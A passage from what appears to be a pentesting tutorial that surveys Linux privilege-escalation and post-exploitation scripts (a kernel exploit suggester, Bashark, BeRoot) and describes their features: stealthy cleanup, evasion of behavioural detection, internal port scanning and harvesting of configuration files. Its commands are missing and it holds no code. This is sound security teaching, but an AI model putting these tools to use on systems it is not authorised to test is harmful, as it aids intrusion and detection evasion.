This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.

Key Improvements Include:

  • More exploits
  • Accurate wildcard matching. This expands the scope of searchable exploits.
  • Output colorization for easy viewing.
  • And more to come

You can use the ‘-k’ flag to manually enter a wildcard for the kernel/operating system release version.

Bashark

Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.

Its features

  • Single Bash script
  • Lightweight and fast
  • Multi-platform: Unix, OSX, Solaris etc.
  • No external dependencies
  • Immune to heuristic and behavioral analysis
  • Built-in aliases of often used shell commands
  • Extends system shell with post-exploitation oriented functionalities
  • Stealthy, with custom cleanup routine activated on exit
  • Easily extensible (add new commands by creating Bash functions)
  • Full tab completion

Execute the following command to download it from GitHub:


To execute the script, run the following command:

The help command lists all the options bashark provides for post-exploitation.

With the portscan option you can scan the internal network from the compromised machine.

To fetch all configuration files use the getconf option; it pulls out all configuration files stored in the /etc directory. Similarly, the getprem option lists all binary files on the target machine.

BeRoot

BeRoot is a post-exploitation tool that checks for common misconfigurations that offer a way to escalate privilege. It does not perform any exploitation. Its main goal is not to carry out a configuration assessment of the host (listing all services, processes, network connections, etc.) but to print only the information it identifies as a potential way to escalate privilege.


To execute the script, run the following command:

It tries to enumerate every loophole that could lead to privilege escalation: as you can observe, the text highlighted in yellow marks a weak configuration that can lead to root privilege escalation, while red marks the technique that can be used to exploit it.

Its functions:

  • Check file permissions
  • SUID binaries
  • NFS root squashing
  • Docker
  • Sudo rules
  • Kernel exploits

Conclusion: The scripts run above are available on GitHub and can easily be downloaded from there. These automated scripts try to identify weak configurations that can lead to root privilege escalation.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a social media and gadget enthusiast.